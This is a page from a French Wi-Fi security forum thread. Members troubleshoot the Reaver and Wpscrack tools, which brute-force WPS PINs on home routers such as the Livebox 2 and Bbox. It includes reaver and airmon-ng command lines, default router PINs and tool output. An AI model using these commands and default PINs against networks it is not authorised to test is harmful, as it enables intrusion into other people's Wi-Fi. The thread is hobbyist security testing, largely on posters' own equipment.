Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 01-01-2012 21:39:47

Bilbo
Membre Hyperactif
Inscription : 31-12-2011
Messages : 45

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Le truc dont je parlais plus haut, celle contre les routeurs Thomson, on peut reconstruire la clef WPA par défaut car on connait l'algorithme de génération. Et comme jusqu'à ya peu les Bbox avaient un routeur Thomson...


Pour continuer sur les Livebox 2 je reprend ce qui a été dit en HS dans un autre sujet:

Bilbo a écrit :

Quant au problème de l'association à l'AP qui échoue [cf le méga post en page 1], c'est quand même curieux. Quelqu'un d'autre ayant une Liveboite 2 a ça? Si oui il faudrait fouiller la source de Reaver (encore un truc marrant à faire, wahou! :p) pour voir comment il s'associe à l'AP. Ou en parler aux auteurs de Reaver, y'a peut être un truc à fixer dans leur code. Parce que même si la Livebox 2 n'autorise que le push button, en quoi ça empêcherait l'association préalable? Surtout que ma station apparaît bien dans le listing de airodump-ng alors même que Reaver me lance des messages d'association foirée.
Si Reaver utilise un Fakeauth (ou similaire) en interne pour s'associer, je pense pas que ce soit la sécurité push-button qui bloque...il n'est peut être même pas encore question de WPS à ce moment... (?)

Enfin j'en sais rien, je suppute! De plus mon PC arrive à échanger des paquets WPS avec la box (il va jusqu'à M4 avant de se faire jeter), lorsque je suis préalablement connecté par Wicd. Ca me laisse penser que si la box jette les requêtes WPS par external NFC (par opposition à push button), elle le fait à M4 plutôt qu'au moment de l'association. A moins que la programmation de la box n'ait pas prévu ce cas de figure et que le fait de pouvoir arriver jusqu'à M4 est une sorte de mini bug... Il faudrait voir comment est censée se faire une connection WPS légitime, comment on est censé utiliser cette fonction avec une interface Windows normale.

antares145 a écrit :

Si tu veux discuter du WPS, je propose qu'on continue sur l'autre topic parce que là on diverge wink

Si tu veux voir à quoi ressemble  une connexion en WPS-PIN réussie, tu peux regarder ce fichier de capture
--> Wireshark sample : wpsdata.cap (libpcap) WPS expanded EAP trace.

superbobo a écrit :

Salut à tous ! Je viens contribuer à faire diverger le topic. "La livebox utilise le mode "pusthe-button" plutôt que simplement le PIN": c'est le plus logique mais alors pourquoi est-il possible de configurer le pin dans l'interface d'administration? Si la fonctionnalité est désactivée, ça n'a pas de sens...
Je me demande si ce n'est pas une version remoulinée, prévue pour fonctionner avec un logiciel propriétaire d'orange, style CD d'installation...

Dernière modification par Bilbo (01-01-2012 21:42:01)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 01-01-2012 21:48:49

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Je vais tester sur ma Bbox thomson histoire de voire si c'est vulnerable, de plus la passephrase a été changer par mes soin ><


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#28 02-01-2012 03:11:34

RoZZ
Membre Hyperactif
Inscription : 23-11-2011
Messages : 52

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Bilbo a écrit :

[...]

Se soucie peut venire du decloack !?!!? car quans celui ci se met en route j obtient la meme chose que toi

Tout se passe tres bien est quand je look dans airodump lancer a coter dés qu il m indique le decloack tout se block.

Et il possible de lancer reaver est le decloak-ng ??

Hors Ligne

#29 02-01-2012 09:18:05

coyotus
Membre Irremplaçable
Lieu : fort fort lointain
Inscription : 05-08-2010
Messages : 884

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

superbobo a écrit :

sur Korben, où la news a aussi été publiée, plusieurs utilisateurs disent que le "sur la Livebox 2, non seulement le WPS est activé, mais en plus le code par défaut est "12345670".

Quelqu'un peut confirmer?

Sur les Bbox2 de belgacom, l'option est activée mais avec la méthode PBC et non PIN, et le code par défaut pour la méthode PIN 12345670.
il semblerais que ce code par défaut est courant à plusieurs box, a tester en premier donc. ce qui rend l'attaque concluante en 2 minutes

capture-1-303376f.png


1310812721.gif

Hors Ligne

#30 02-01-2012 14:04:30

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Quand on est associé, est ce que cela voudrait dire, qu'on "peut" et on "va" attaquer (brute forcer le code PIN) ??
je demande ca, parce que je suis associée à mon routeur, mais je ne vois pas les attaques (trying code PIN, ...)
ca prend du temps entre association et les attaques code PIN ??

Hors Ligne

#31 02-01-2012 14:19:32

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

As tu bien penser a l'option "verbose" ? ( -vv )


Sharkoff

Hors Ligne

#32 02-01-2012 14:25:03

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Squaks a écrit :

As tu bien penser a l'option "verbose" ? ( -vv )

biensur

(ma commande)
./reaver -i mon0 -c 6 -b xx:xx:xx:xx:xx -vv

Il me dit que je suis associée, ..mais rien d autres !

Hors Ligne

#33 02-01-2012 16:50:05

pamputt
Membre Hyperactif
Inscription : 17-10-2010
Messages : 63

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Je dispose moi aussi d'une livebox 2 avec le WPS activé par défaut et le code 01234567 par défaut. J'ai donc récupéré la version svn de reaver qui offre la possibilité de spécifier nous-même le pin à tester. Je tape donc

reaver -i mon0 -b 00:11:22:33:44:55 -p 01234567 -vv

Et voici ce que j'obtiens

Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 00:11:33:33:44:55
[+] Switching mon0 to channel 6
[+] Associated with 00:11:33:33:44:55 (ESSID: Livebox-abcd)
[+] Trying pin 01234565

J'ai tester plusieurs fois et pas moyen qu'il indique « Trying pin 01234567 ». J'ai essayé d'indiquer manuellement ce code pin dans les sources mais ça fait crasher le programme (segfault) sûrement parce que je ne l'ai pas spécifier au bon endroit.
Est ce que vous pouvez vérifier que le code pin spécifier est bien celui qui est testé ?

Hors Ligne

#34 02-01-2012 16:54:39

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Ben , le code PIN par défault est 12345670

Hors Ligne

#35 02-01-2012 16:59:22

pamputt
Membre Hyperactif
Inscription : 17-10-2010
Messages : 63

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Oh bah oui tu as raison, je resteste ça tout de suite. roll

Hors Ligne

#36 02-01-2012 17:21:05

XX
Membre
Inscription : 27-08-2011
Messages : 16

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

petite question ... sur quelle version de Reaver est l'option "-p" ?

[email protected]:~/reaver-1.2/src# reaver -i mon0 -b 00:XX:6A:XX:XX:XX  -p 12345670 -vv

Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

reaver: invalid option -- 'p'

Hors Ligne

#37 02-01-2012 17:30:27

pamputt
Membre Hyperactif
Inscription : 17-10-2010
Messages : 63

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Sur la version de développement  que tu peux obtenir en suivant les infos données ici.

Hors Ligne

#38 02-01-2012 17:49:53

XX
Membre
Inscription : 27-08-2011
Messages : 16

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

pamputt a écrit :

Sur la version de développement  que tu peux obtenir en suivant les infos données ici.

ah bah voilà version 1.3, merci !

Hors Ligne

#39 02-01-2012 18:17:39

pamputt
Membre Hyperactif
Inscription : 17-10-2010
Messages : 63

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Bon maintenant que j'ai le bon code par défaut pour ma livebox, je recommence. Et impossible de réussir l'attaque ; j'obtiens ceci

reaver -i mon0 -b 00:11:22:33:44:55 -p "12345670" -vv

Reaver v1.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching mon0 to channel 6
[+] Associated with 00:11:22:33:44:55 (ESSID: Livebox-abcd)
[+] Trying pin 12345670
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[+] Trying pin 12345670
[!] WARNING: Receive timeout occurred
[+] Trying pin 12345670
[!] WARNING: Receive timeout occurred
[!] WARNING: Receive timeout occurred
[+] Trying pin 12345670
[!] WARNING: Receive timeout occurred

en boucle.
Par contre je ne crois pas qu'il y ait un problème avec ce code pin puisque quand je ne spécifie pas de pin à reaver il arrive sans problème à passer au suivant. Je penche plutôt pour un bogue dans le code de reaver du fait qu'on utilise une version de développement, tout n'est peut-être pas terminé au niveau du codage.

Hors Ligne

#40 02-01-2012 19:46:17

Bilbo
Membre Hyperactif
Inscription : 31-12-2011
Messages : 45

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

En tout cas Pamputt, t'as pas l'air d'avoir de problèmes d'association.
Essaie de lancer Reaver avec le paramètre -d. Par défaut le programme teste un code PIN par seconde, avec -d tu peux changer ça en -d 5 pour un PIN toutes les 5 secondes par exemple. Comme ça si ça marche toujours pas on pourra mettre de côté une raison possible de foirage.


Autre chose: Quelle est ta carte wifi? Et quel est ton pilote wifi?

Hors Ligne

#41 02-01-2012 20:20:01

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

J'ai essayé en téléchargeant manuellemnt la dernière version de WPS reaver et aussi via SVN mais dans les deux cas je me retrouve avec ce message:

Reaver v1.3 beta WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[-] Failed to initialize interface 'mon0'
[-] Failed to recover WPA key

Pourtant l'interface en mode monitor est bien activée et fonctionne avec airodump-ng


[email protected]:~$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:"ONO0101"  
          Mode:Managed  Frequency:2.452 GHz  Access Point: 02:30:B4:C0:43:B1   
          Bit Rate=9 Mb/s   Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=26/70  Signal level=-84 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:24   Missed beacon:0

mon0      IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
[email protected]:~$ sudo airmon-ng
[sudo] password for ana: 


Interface	Chipset		Driver

wlan0		Atheros 	ath5k - [phy0]
mon0		Atheros 	ath5k - [phy0]

[email protected]:~$ sudo airodump-ng --channel 12 mon0
 CH 12 ][ Elapsed: 0 s ][ 2012-01-02 19:56 ][ fixed channel mon0: -1           
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 00:19:15:.............  -90   0        3        0    0  11  54   WPA  TKIP   PSK  WW
 .............:56:BD:EC  -89   0        3        0    0  11

Le chipset que j'utilise est un atheros dans un portable acer sous la dernière version de xubuntu i386 avec auircack-ng installé via SVN hier.
chipset:

AR242x / AR542x Wireless Network Adapter (PCI-Express)

maintenat j'essaye avec un ar 9271 USB d'Atheros (stick wn422g de tp-link) et même problème

[email protected]:~$ sudo airmon-ng stop mon0 
[sudo] password for ana: 


Interface	Chipset		Driver

wlan0		Atheros 	ath5k - [phy0]
mon0		Atheros 	ath5k - [phy0] (removed)
wlan2		Atheros AR9271	ath9k - [phy1]

[email protected]:~$ sudo airmon-ng start wlan2


Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
487	avahi-daemon
489	avahi-daemon
490	NetworkManager
996	wpa_supplicant
3878	dhclient
4021	dhclient
Process with PID 3878 (dhclient) is running on interface wlan0
Process with PID 4021 (dhclient) is running on interface wlan2


Interface	Chipset		Driver

wlan0		Atheros 	ath5k - [phy0]
wlan2		Atheros AR9271	ath9k - [phy1]
				(monitor mode enabled on mon0)

et exactement le même message d'erreur.
Et maintenant avec un wifisky usb équipé de chipset ralink de haute-puissance

 sudo airmon-ng stop mon0
[sudo] password for ana: 


Interface	Chipset		Driver

wlan0		Atheros 	ath5k - [phy0]
wlan2		Atheros AR9271	ath9k - [phy1]
mon0		Atheros AR9271	ath9k - [phy1] (removed)
wlan1		Ralink RT2870/3070	rt2800usb - [phy2]

[email protected]:~$ sudo airmon-ng start wlan1


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e 
PID	Name
487	avahi-daemon
489	avahi-daemon
490	NetworkManager
996	wpa_supplicant
3878	dhclient
Process with PID 3878 (dhclient) is running on interface wlan0


Interface	Chipset		Driver

wlan0		Atheros 	ath5k - [phy0]
wlan2		Atheros AR9271	ath9k - [phy1]
wlan1		Ralink RT2870/3070	rt2800usb - [phy2]
				(monitor mode enabled on mon0)

et le même message...

reaver -i mon0 -b 00:xx:xx:xx:xx:xx -c 1 -vv

Reaver v1.3 beta WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[-] Failed to initialize interface 'mon0'
[-] Failed to recover WPA key

Une question: quelle est la librairie exacte libpcap faut il installer?
J'ai premièrement installé la dernière version de libpcap depuis le site officiel, mais il me manquait lipcap.so.1, j'ai cherhé, n'ai pas trouvé. Je suis allé sur synaptic packet manager et j'ai commencé à mettre des paquets libpcap qui me semblaient pouvoir être les bons. Ça nne marchait pas j'ai donc plus ou moins tout coché et ça a marché...
Avec quels chipsets avez vous réussis?
Quel fichier libpcap avez vous installé?

Hors Ligne

#42 02-01-2012 20:32:32

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Salut à tous,

Ma petite contribution: d'après l'auteur de reaver (cf le pdf) "WPS - PIN (external regisrar) is mandatory for WPS certification".  A mon avis, ça doit fonctionner sur la livebox mais le problème vient d'ailleurs...

Toutes les cartes wifi ne sont pas compatibles avec reaver. Pour voir la liste: http://code.google.com/p/reaver-wps/wik … essDrivers
Ca expliquerait peut-être les problèmes rencontrés par certains?

Sinon, pour libpcap, j'ai la version 1.1.1-5.6.1. Je tourne sous opensuse 11.4

Dernière modification par superbobo (02-01-2012 20:35:19)

Hors Ligne

#43 02-01-2012 20:40:28

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Enfin, une bonne nouvelle, lue à l'instant sur le site:

"The decision has been made to open source the entire commercial version of the Reaver command line tool. This means that the open source version of Reaver will have pause/resume functionality"

Pour ce qui est du problème rencontré sur les livebox, pourquoi ne pas en parler directement aux auteurs dans la section http://code.google.com/p/reaver-wps/issues/list   ? Et joindre un petit fichier de capture pour qu'ils donnent leur avis? Ils ont surement autre chose à foutre, mais ça vaut le coup d'essayer, surtout qu'ils ont l'air assez cools ! Beaucoup de gens dont moi leur ont demandé d'ajouter une option pour spécifier directement le pin à entrer. Quelques heures après, c'était fait !

Et puis bon, vu que ça fait 1an qu'ils perfectionnent l'attaque, et qu'ils l'ont testé sur des centaines de routeurs, ça m'étonnerait qu'ils n'aient pas déjà rencontré exactement le même problème...

Quelqu'un voudrait le faire (pour éviter de leur envoyer 10fois le même message)?

Dernière modification par superbobo (02-01-2012 20:47:07)

Hors Ligne

#44 02-01-2012 20:50:31

superbobo
Membre Indéboulonnable
Inscription : 15-11-2011
Messages : 139

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Je floode à mort... mais bon, je viens de lire ça aussi, concernant la nouvelle version sur le point d'être releasée:
https://code.google.com/p/reaver-wps/is … tail?id=54

"This also means that Reaver will have the ability to specify specific options for a given model inside a database. In other words, if it is known that certain options are required or helpful when attacking XYZ router, you can put them in the database and they will be automatically applied whenever you target that model router. How often this database will be updated remains to be seen, obviously those paying for the support plan will take priority"

C'est pas mortel ça? Qui sait, ça réglera peut être le problème rencontré sur les livebox !

Hors Ligne

#45 02-01-2012 22:12:57

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Sinon vous pouvez peut etre aussi tester l'autre tool de bruteforce WPS: Wpscrack histoire de voir ce que ça donne smile

Hors Ligne

#46 02-01-2012 23:02:11

Bilbo
Membre Hyperactif
Inscription : 31-12-2011
Messages : 45

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

J'ai testé Wpscrack déjà et ça marche pas non plus ^^
Vu qu'il me dit pas grand chose d'intéressant je sais pas la nature exacte du problème qu'il rencontre donc je ne peux tirer aucune conclusion pour l'instant.

Pour la Livebox 2 j'ai aussi lu un post (de l'auteur de Reaver je crois, pas sûr) disant que l'AP balance l'information sur sa config WPS dans les beacons, et qu'il fallait donc y jeter un oeil pour les AP dont l'interface admin ne donne aucune info. C'est comme j'avais remarqué. Et le problème c'est que le flag "external truc" était à 0 et Push button, à 1. Si external truc est indispensable pour se connecter en WPS, rien n'empêche d'avoir la fonctionnalité désactivée jusqu'à ce que quelqu'un "push the button", non? Donc à mon humble avis la Livebox est blindée.

MAIS, ça ne résout pas tous les problèmes soulevés sur la Liveboite dans ce sujet... notamment celui de l'association foirée (pour ne pas tout ramener à moi big_smile)

Je leur parlerai de Livebox plus tard, pour l'instant ce qui me fait douter c'est ma carte et son pilote et ils ont pas encore bien répondu là dessus. Vu que je sais pas avec certitude ce qui est dû à la LB et ce qui est dû à mon PC je dois attendre d'en savoir plus sur mon PC pour pas pourrir leurs données sur les Livebox 2.
Si quelqu'un a moins d'incertitudes que moi du fait par exemple d'une config valide, ça serait bien de parler Livebox aux créateurs de Reaver en effet!

@kcdtv: Essaie donc avec Backtrack 5 R1. Tu as l'air de bien connaître ubuntu et BT est basé dessus... Si Reaver fonctionne chez toi sous BT il te suffira de zyeuter la libpcap de cet OS ainsi que tout ce que tu veux savoir d'autre. J'peux pas t'aider je maîtrise pas trop Ubuntu.



PS: Ceux qui ont une Livebox 2 et qui n'arrivent pas à mener l'attaque au bout, pouvez vous nous donner:
- Le modèle de votre carte wifi
- Le nom du pilote (ex: ath9k, iwlagn...)
- Votre système d'exploitation (ex: BackTrack 5 R1)
- Les messages d'erreur de Reaver (s'il y en a) quand vous essayez l'attaque contre autre chose qu'une Livebox, ça nous aidera à voir plus clair

Dernière modification par Bilbo (02-01-2012 23:10:09)

Hors Ligne

#47 02-01-2012 23:15:13

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Ca marche. Il faut lancer reaver comme admin (sudo) tongue: lol
Donc en fait pas de problemes avec

AR242x / AR542x Wireless Network Adapter (PCI-Express)

compatible avec WPS Reaver

Dernière modification par kcdtv (02-01-2012 23:15:45)

Hors Ligne

#48 03-01-2012 14:55:59

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Bonjour,

ça fait plaisir de voir qu'il y a des nouveautés dans le monde du wifi, en ce moment pour cause de problèmes privés je n'ai pas le temps de tester grand chose, mais dès que j'aurais plus le temps et la motivation je teste ça, meme si vos tests ont été révélateurs j'ai besoin de voir les choses par moi meme wink

Hors Ligne

#49 03-01-2012 18:36:26

RoZZ
Membre Hyperactif
Inscription : 23-11-2011
Messages : 52

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

koala a écrit :

Bonjour,

ça fait plaisir de voir qu'il y a des nouveautés dans le monde du wifi, en ce moment pour cause de problèmes privés je n'ai pas le temps de tester grand chose, mais dès que j'aurais plus le temps et la motivation je teste ça, meme si vos tests ont été révélateurs j'ai besoin de voir les choses par moi meme wink

Merci beaucoup pour ton intervention tu a fait avancer pas mal de membres avec le -->

-->> dès que j'aurais plus le temps et la motivation je teste ça .

repasse quand tu serat motiver lol ou eventuellement le time si ta vie privée ne l emporte pas sur ta motivation

hahahahahahahaha

PS; j ai resister toute la journée avant de lacher sa

Hors Ligne

#50 03-01-2012 18:51:01

pamputt
Membre Hyperactif
Inscription : 17-10-2010
Messages : 63

Re : Bruteforce WPS (Wifi Protected Setup): Reaver-wps & Wpscrack

Pour info, la version 1.3 de revaer-wps est sortie aujourd'hui. Il y a maintenant la présence d'un soft qui s'appelle walsh et qui permet de scanner les réseaux alentours pour lister ceux qui ont du WPS activé.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Quelle carte wifi choisir ? par Morpheus_Dotcom
2 62 Hier 15:11:00 par Morpheus_Dotcom
8 290 17-11-2016 12:02:17 par koala
Problème reaver par Antho3674
4 301 15-11-2016 22:05:12 par kcdtv
Bruteforce WPS par regard48
8 399 15-11-2016 16:19:36 par Fab955
0 270 22-10-2016 19:03:48 par Antho3674

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.034 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]